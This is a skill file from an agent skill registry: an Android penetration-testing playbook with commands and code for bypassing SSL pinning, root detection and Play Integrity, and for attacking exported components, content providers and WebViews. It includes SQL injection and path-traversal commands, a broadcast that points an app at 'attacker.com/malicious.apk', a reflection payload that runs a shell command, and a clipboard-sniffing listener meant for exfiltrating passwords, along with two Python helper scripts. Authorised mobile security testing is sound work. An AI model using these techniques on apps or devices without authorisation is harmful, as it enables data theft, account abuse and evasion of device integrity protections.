# android-pentesting-tricks

Installs: 598
Rank: #6070

## Install

```shell
npx skills add https://github.com/yaklang/hack-skills --skill android-pentesting-tricks
```
# SKILL: Android Pentesting Tricks — Expert Attack Playbook

## AI LOAD INSTRUCTION

Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.

## 0. RELATED ROUTING

Before going deep, consider loading:

- mobile-ssl-pinning-bypass for in-depth cross-platform SSL pinning bypass techniques and framework-specific hooks
- ios-pentesting-tricks when also testing the iOS version of the same app
- api-sec for backend API security testing once traffic is intercepted

### Advanced Reference

Also load FRIDA_SCRIPTS.md when you need:

- Ready-to-use Frida script templates for common Android testing tasks
- Detailed hook points for OkHttp, Retrofit, Volley, WebView
- Root detection bypass script collection

## 1. SSL PINNING BYPASS

### 1.1 Frida Universal Bypass

Install frida-server on the device. This needs root (run the `adb shell` commands below after `adb root`, or wrap them in `su -c`), and the frida-server version must match the `frida` tools installed on the host:

```shell
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"
```

Universal SSL pinning bypass (spawn the app with the script injected before any network code runs):

```shell
frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause
```

Note: `--no-pause` is a frida-tools < 12 flag. frida-tools 12+ (the Frida 16 generation) resumes the spawned process by default and rejects the flag; drop it there and use `--pause` if you want the old behaviour.

| Hook Point | Library/Class | Coverage |
|---|---|---|
| X509TrustManager.checkServerTrusted | Android SDK | All standard HTTPS |
| OkHttpClient.Builder.sslSocketFactory | OkHttp 3.x/4.x | Square OkHttp |
| CertificatePinner.check | OkHttp 3.x/4.x | OkHttp pinning |
| HttpsURLConnection.setSSLSocketFactory | Android SDK | Legacy HTTPS |
| SSLContext.init | Android SDK | Custom SSL contexts |
| WebViewClient.onReceivedSslError | WebView | WebView SSL errors |
| TrustManagerFactory.getTrustManagers | Android SDK | Factory-created TMs |

### 1.2 Objection (Quick Method)

```shell
objection -g com.target.app explore
```

Inside the Objection REPL:

```
android sslpinning disable
```

### 1.3 Network Security Config (Debug Builds)

If you can modify the APK or it's a debug build, a `<debug-overrides>` block makes the app trust the user CA store, where your proxy CA is installed. Two caveats: `<debug-overrides>` is honoured only while `android:debuggable="true"`, and apps targeting API 24+ ignore user CAs by default, so for a repackaged release build put the same `<trust-anchors>` under `<base-config>` instead:

```xml
<network-security-config>
    <debug-overrides>
        <trust-anchors>
            <certificates src="user" />
        </trust-anchors>
    </debug-overrides>
</network-security-config>
```

### 1.4 Magisk Module Approach

| Module | Method | Scope |
|---|---|---|
| LSPosed + TrustMeAlready | Hooks system-wide TrustManager | All apps |
| LSPosed + SSLUnpinning | Targeted SSL bypass | Per-app |
| MagiskTrustUserCerts | Moves user CA to system store | All apps trusting system CAs |
| ConscryptTrustUserCerts | Mounts user CAs into the Conscrypt APEX | Android 14+, where the system CA store moved out of /system into the Conscrypt module |

## 2. COMPONENT EXPOSURE

### 2.1 Exported Activities

Find exported activities (AndroidManifest.xml, or from the binary manifest with aapt). `aapt dump xmltree` prints booleans as `0xffffffff`, not `true`, so match both forms. Remember that this only finds explicit `android:exported` declarations: on targetSdkVersion < 31, a component with an `<intent-filter>` and no `android:exported` attribute is exported implicitly.

```shell
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 -E "exported.*(true|0xffffffff)"
```
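The implicit-export rule above is what a grep misses, so here is a small manifest auditor that applies the platform defaults. This is an added example for this section, not code from the original playbook or the hack-skills project: it assumes a decoded text manifest (what apktool writes), the sample manifest, package and component names are constructed for the demo, and the generated adb one-liners are the same explicit-component invocations used elsewhere in this section.

```python
"""Enumerate exported Android components from a decoded AndroidManifest.xml.

Added example, not part of the original playbook. Rules applied when
android:exported is absent: activities/services/receivers are exported iff they
declare an <intent-filter> and targetSdkVersion < 31; providers are exported
iff targetSdkVersion < 17. An explicit attribute always wins.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest; package and component names are hypothetical.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.target.app">
    <uses-sdk android:minSdkVersion="23" android:targetSdkVersion="30" />
    <application android:allowBackup="true">
        <activity android:name=".MainActivity" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <!-- no android:exported, but an intent-filter: implicitly exported on targetSdk 30 -->
        <activity android:name=".DeepLinkActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW" />
                <category android:name="android.intent.category.DEFAULT" />
                <category android:name="android.intent.category.BROWSABLE" />
                <data android:scheme="target" android:host="callback" />
            </intent-filter>
        </activity>
        <activity android:name=".InternalAdminActivity" android:exported="false" />
        <service android:name=".BackgroundService" android:exported="true"
                 android:permission="com.target.app.permission.INTERNAL" />
        <receiver android:name="UpdateReceiver">
            <intent-filter>
                <action android:name="com.target.app.ACTION_UPDATE" />
            </intent-filter>
        </receiver>
        <provider android:name=".UserProvider"
                  android:authorities="com.target.app.provider" />
    </application>
</manifest>
"""


def _attr(el, name):
    """Read an android:-namespaced attribute (None when absent)."""
    return el.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component, target_sdk):
    """Apply the platform defaults for android:exported when the attribute is absent."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return target_sdk < 17
    # API 31+ refuses to install a filtered component without an explicit value,
    # so the implicit rule only applies below it.
    return component.find("intent-filter") is not None and target_sdk < 31


def exported_components(manifest_xml, target_sdk=None):
    """Return a dict per exported component: type, resolved name, authority, permission, schemes."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    if target_sdk is None:
        sdk = root.find("uses-sdk")
        target_sdk = int(_attr(sdk, "targetSdkVersion") or 1) if sdk is not None else 1
    results = []
    for comp in root.find("application"):
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp, target_sdk):
            continue
        name = _attr(comp, "name")
        if name.startswith("."):          # ".Foo" -> "<pkg>.Foo"
            name = pkg + name
        elif "." not in name:             # "Foo" -> "<pkg>.Foo"
            name = pkg + "." + name
        results.append({
            "type": comp.tag,
            "name": name,
            "authority": _attr(comp, "authorities"),
            "permission": _attr(comp, "permission"),   # shell uid usually lacks custom permissions
            "implicit": _attr(comp, "exported") is None,
            "schemes": sorted({_attr(d, "scheme") for d in comp.iter("data") if _attr(d, "scheme")}),
        })
    return results


def adb_command(comp, pkg):
    """adb one-liner that reaches the component with an explicit-component intent from the shell uid."""
    target = "%s/%s" % (pkg, comp["name"])
    if comp["type"] in ("activity", "activity-alias"):
        cmd = "adb shell am start -n " + target
        if comp["schemes"]:
            cmd += " -d '%s://'" % comp["schemes"][0]
        return cmd
    if comp["type"] == "service":
        return "adb shell am startservice -n " + target
    if comp["type"] == "receiver":
        return "adb shell am broadcast -n " + target
    return "adb shell content query --uri content://%s" % comp["authority"]


if __name__ == "__main__":
    for c in exported_components(SAMPLE_MANIFEST):
        flag = "implicit" if c["implicit"] else "explicit"
        print("%-9s %-45s %-8s perm=%s" % (c["type"], c["name"], flag, c["permission"]))
        print("    " + adb_command(c, "com.target.app"))
```

Run it against the sample and the two implicitly exported components (`DeepLinkActivity`, `UpdateReceiver`) show up alongside the explicit ones; pass `target_sdk=31` and they disappear, which is exactly the attack surface difference between an old and a current target SDK.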

Launch an exported activity directly, or feed it a deep link:

```shell
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
  -d "target://callback?token=attacker_token"
```

With extra data:

```shell
adb shell am start -n com.target.app/.TransferActivity \
  --es "amount" "99999" --es "recipient" "attacker"
```

### 2.2 Content Providers

Query an exposed content provider:

```shell
adb shell content query --uri content://com.target.app.provider/users
```

SQL injection through the selection argument of a database-backed provider:

```shell
adb shell content query --uri "content://com.target.app.provider/users" \
  --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"
```

Path traversal in a file-backed content provider:

```shell
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"
```

| Provider Type | Attack Vector | Impact |
|---|---|---|
| Database-backed | SQL injection via query() projection/selection | Data leak, auth bypass |
| File-backed | Path traversal via URI | Read arbitrary files |
| Parcelable | Type confusion in custom Parcelable | Code execution |

### 2.3 Broadcast Receivers

Send a crafted broadcast to an exported receiver:

```shell
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
  --es "url" "http://attacker.com/malicious.apk"
```

Ordered broadcast interception: register a receiver with a higher `android:priority` than the target's, so it receives the ordered broadcast first and can read, modify (`setResultData`) or abort (`abortBroadcast`) it before the legitimate receiver sees it.

### 2.4 Exported Services

Start or bind to an exported service:

```shell
adb shell am startservice -n com.target.app/.BackgroundService \
  --es "command" "exfiltrate"
```

List the target's running services:

```shell
adb shell dumpsys activity services | grep com.target
```

## 3. WEBVIEW VULNERABILITIES

### 3.1 JavaScript Interface RCE (Pre-API 17)

Before API 17 every public method of a bridge object was reachable from page JavaScript, including `getClass()`, which is enough to walk reflection to `Runtime.exec`. From API 17 only methods annotated `@JavascriptInterface` are exposed, but that restriction applies only to apps with targetSdkVersion >= 17: an app targeting a lower SDK stays vulnerable on any device.

```java
// Vulnerable code: bridge object exposed to page JavaScript
webView.addJavascriptInterface(new JSInterface(), "android");
```

```javascript
// Pre-API 17 (or targetSdkVersion < 17): reflection-based RCE, injected into the WebView
android.getClass().forName('java.lang.Runtime')
       .getMethod('getRuntime').invoke(null).exec('id');
```

### 3.2 Modern WebView Attacks

| Vulnerability | Condition | Exploit |
|---|---|---|
| setJavaScriptEnabled(true) + untrusted content | JS enabled + attacker controls loaded URL | XSS → bridge access |
| setAllowFileAccessFromFileURLs(true) | file:// can read other file:// | Load file:///data/data/com.target/... |
| setAllowUniversalAccessFromFileURLs(true) | file:// can access any origin | Exfiltrate via XHR to attacker |
| loadUrl(user_controlled) | User input in loadUrl | javascript: scheme or file:// |
| shouldOverrideUrlLoading bypass | Incomplete URL validation | Redirect to attacker-controlled page |
| evaluateJavascript with tainted data | User data in JS execution | XSS in WebView context |

### 3.3 Deep Link to WebView Chain

1. Attacker crafts a deep link: `target://webview?url=https://attacker.com/xss.html`
2. App opens a WebView with the attacker URL
3. XSS in the WebView calls the JavaScript bridge: `android.sensitiveMethod()`
4. Bridge executes in the app context with the app's permissions

## 4. INTENT REDIRECTION

An exported activity receives an Intent and starts another (internal) activity using data from the received Intent.

```java
// Vulnerable pattern: forwarding an attacker-supplied Intent
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any internal activity, including
// ones marked android:exported="false", with this app's identity
```

Exploit: start a non-exported internal activity via redirection. Note that `am start` cannot attach a Parcelable Intent extra (`--es` passes a String, so `getParcelableExtra("next_intent")` returns null); a real nested Intent has to come from a PoC app that puts an explicit Intent for `InternalAdminActivity` into the `next_intent` extra, or from a Frida hook. The `intent:` URI string below works only against apps that rebuild the extra with `Intent.parseUri()`:

```shell
adb shell am start -n com.target.app/.ExportedActivity \
  --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"
```

| Pattern | Indicator | Risk |
|---|---|---|
| getParcelableExtra → startActivity | Intent-in-Intent | Start non-exported activities |
| getStringExtra("url") → startActivity(Intent.ACTION_VIEW) | URL forwarding | Open arbitrary URLs |
| getStringExtra("class") → Class.forName → startActivity | Dynamic class loading | Start any activity by name |

## 5. ROOT DETECTION BYPASS

### 5.1 Common Root Detection Checks

| Check | What It Detects | Frida Bypass |
|---|---|---|
| su binary exists | /system/xbin/su, /sbin/su | Hook File.exists() → return false |
| Build tags contain "test-keys" | Build.TAGS | Hook Build.TAGS → return "release-keys" |
| Magisk Manager installed | Package name check | Hook PackageManager.getPackageInfo |
| Superuser.apk present | Su management app | Hook File.exists() |
| RootBeer library | Multi-check root detection | Hook all RootBeer check methods |
| SafetyNet/Play Integrity | Server-side attestation | Requires Magisk DenyList + module |
| Abnormal system properties | ro.debuggable=1, etc. | Hook SystemProperties.get |

### 5.2 Magisk DenyList (Previously MagiskHide)

- Enable DenyList in Magisk Manager
- Add the target app to the DenyList so Magisk hides itself from that app
- Covers: su binary, Magisk Manager package, mount points, props

## 6. PLAY INTEGRITY / SAFETYNET BYPASS

| Level | What It Checks | Bypass Difficulty |
|---|---|---|
| Basic Integrity | Not rooted, not emulator | Easy (Magisk + DenyList) |
| Device Integrity | Bootloader locked, verified boot | Hard (requires locked bootloader) |
| Strong Integrity | Hardware-backed attestation | Very hard (hardware TEE) |

Techniques:

- Magisk with Zygisk enabled + DenyList for the target app
- Play Integrity Fix (PIF) Magisk module: spoofs the device fingerprint
- Shamiko module: hides root from specific apps
- Custom ROM with locked bootloader (Pixel-specific tricks)
## 7. TAPJACKING (OVERLAY ATTACKS)

The attacker app declares a transparent activity (or a SYSTEM_ALERT_WINDOW overlay) drawn over the victim's UI, so the user's taps land on victim controls they cannot see:

```xml
<activity
    android:name=".OverlayActivity"
    android:theme="@style/TransparentTheme"
    android:excludeFromRecents="true">
</activity>
```

| Android Version | Protection | Bypass |
|---|---|---|
| Pre-6.0 | None | Full overlay |
| 6.0–11 | filterTouchesWhenObscured (opt-in) | Apps not using it are vulnerable |
| 12+ | Untrusted touches blocked for overlay windows | Partial overlays, timing-based |

## 8. BACKUP EXTRACTION

Check whether backup is allowed. `android:allowBackup` defaults to true when absent. On Android 12+, apps targeting API 31+ have their data excluded from `adb backup` unless the app is debuggable, so this path mostly applies to older targets.

```shell
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)
```

Extract the backup (confirm the prompt on the device and leave the password empty so the archive is not encrypted):

```shell
adb backup -f backup.ab -apk com.target.app
```

Convert to tar. The `dd` skip assumes the 24-byte header of an unencrypted, compressed, single-digit-version archive (`ANDROID BACKUP\n5\n1\nnone\n`), and `openssl zlib` requires an OpenSSL built with zlib support; if either assumption fails, use android-backup-extractor instead:

```shell
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar
```

Analyze the extracted data. The tar unpacks to `apps/<package>/`, with shared_prefs/ stored as `sp/` and databases/ as `db/`:

```shell
find apps/com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
```

- Check `sp/` (the app's shared_prefs/) for tokens, credentials
- Check `db/` (the app's databases/) for SQLite DBs with sensitive data
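The `dd | openssl zlib` pipeline fails silently on a header that is not exactly 24 bytes and on an OpenSSL without zlib. The following is an added example (not code from the original playbook or the hack-skills project) that does the same conversion by parsing the `.ab` header, refusing encrypted archives explicitly and listing the files worth opening first. It runs on an archive constructed in memory from a tiny tarball laid out like real `adb backup` output; the package, paths and token value are hypothetical.

```python
"""Parse and unpack an `adb backup` archive (.ab) without dd/openssl.

Added example, not from the original playbook. The header is four
newline-terminated lines: magic, format version, compression flag (0/1)
and encryption ("none" or "AES-256"). It is 24 bytes only for a
single-digit version with encryption "none"; a password-protected archive
carries extra lines (salt, rounds, IV, master-key blob) after those four.
"""
import io
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP"


def parse_ab_header(data):
    """Return (version, compressed, encryption, payload_offset)."""
    lines, pos = [], 0
    for _ in range(4):
        nl = data.index(b"\n", pos)
        lines.append(data[pos:nl])
        pos = nl + 1
    if lines[0] != MAGIC:
        raise ValueError("not an Android backup archive")
    return int(lines[1]), lines[2] == b"1", lines[3].decode("ascii"), pos


def ab_to_tar(data):
    """Strip the header and inflate the payload into raw tar bytes."""
    _version, compressed, encryption, offset = parse_ab_header(data)
    if encryption != "none":
        # Password-protected: the tar is AES-256-CBC under a PBKDF2-derived key.
        # Feed the backup password to android-backup-extractor instead.
        raise ValueError("encrypted backup (%s), password required" % encryption)
    body = data[offset:]
    return zlib.decompress(body) if compressed else body


def sensitive_files(tar_bytes):
    """Sorted names of the files an assessor opens first: prefs XML, SQLite DBs, JSON."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tf:
        return sorted(m.name for m in tf.getmembers()
                      if m.isfile() and m.name.endswith((".xml", ".db", ".json")))


def build_sample_ab(files, compressed=True, version=5, encryption="none"):
    """Construct an archive laid out like `adb backup` output (apps/<pkg>/<sp|db|f>/...)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    body = buf.getvalue()
    if compressed:
        body = zlib.compress(body)     # adb backup deflates with java.util.zip, zlib-framed
    header = b"%s\n%d\n%d\n%s\n" % (MAGIC, version, 1 if compressed else 0, encryption.encode())
    return header + body


# Constructed sample contents; the token is a placeholder, not real data.
SAMPLE_FILES = {
    "apps/com.target.app/_manifest": b"com.target.app\n1\n",
    "apps/com.target.app/sp/session.xml":
        b'<map><string name="auth_token">constructed-session-token</string></map>',
    "apps/com.target.app/db/users.db": b"SQLite format 3\x00",
    "apps/com.target.app/f/cache.bin": b"\x00\x01\x02",
}


if __name__ == "__main__":
    archive = build_sample_ab(SAMPLE_FILES)
    version, compressed, encryption, offset = parse_ab_header(archive)
    print("version=%d compressed=%s encryption=%s header_bytes=%d" % (version, compressed, encryption, offset))
    for name in sensitive_files(ab_to_tar(archive)):
        print("  " + name)
```

To use it on a real capture, read `backup.ab` into `data`, call `ab_to_tar(data)` and write the result to `backup.tar`; `sensitive_files` then gives the same shortlist the `find` command above produces after extraction.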

## 9. ADDITIONAL TRICKS

### 9.1 Debuggable App Exploitation

If `android:debuggable="true"` is set in the manifest, `run-as` drops you into the app's own uid with full access to its data directory:

```shell
adb shell run-as com.target.app
cat /data/data/com.target.app/shared_prefs/*.xml
```

### 9.2 Drozer (Component Testing Framework)

List the attack surface:

```
dz> run app.package.attacksurface com.target.app
Exported Activities: 3
Exported Services: 1
Exported Providers: 2
```

Query a provider:

```
dz> run app.provider.query content://com.target.app.provider/users
```

Scan for injection:

```
dz> run scanner.provider.injection -a com.target.app
```

### 9.3 Clipboard Sniffing

Before Android 10 any app, including one in the background, could read the clipboard; from Android 10 only the foreground app and the default IME can.

```java
import android.content.ClipData;
import android.content.ClipboardManager;

// Pre-Android 10: any app can read the clipboard
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();
    // Exfiltrate copied passwords, tokens, etc.
});
```

## 10. ANDROID PENTESTING DECISION TREE

```
Testing Android application
│
├── Can intercept HTTPS traffic?
│   ├── No → SSL pinning in place
│   │   ├── Frida available? → universal SSL bypass script (§1.1)
│   │   ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│   │   ├── Debug build? → Network Security Config (§1.3)
│   │   └── None above? → manual decompile + patch + repackage
│   └── Yes → proceed to traffic analysis
│
├── Exported components found?
│   ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│   ├── Content Providers → SQLi, path traversal (§2.2)
│   ├── Broadcast Receivers → crafted intent injection (§2.3)
│   └── Services → unauthorized service binding (§2.4)
│
├── WebView present?
│   ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│   ├── File access enabled? → file:// scheme abuse (§3.2)
│   └── Deep link → WebView? → URL injection chain (§3.3)
│
├── Intent handling found?
│   └── Intent-in-Intent pattern? → redirect to internal activity (§4)
│
├── Root detection blocking testing?
│   ├── Client-side checks only? → Frida hook bypass (§5.1)
│   ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│   └── Custom obfuscated checks? → reverse engineer + targeted hooks
│
├── Sensitive data storage?
│   ├── allowBackup=true? → ADB backup extraction (§8)
│   ├── Debuggable? → run-as for direct data access (§9.1)
│   └── SharedPreferences → check for plaintext tokens/credentials
│
└── UI-based attacks applicable?
    └── Overlay possible? → tapjacking (§7)
```
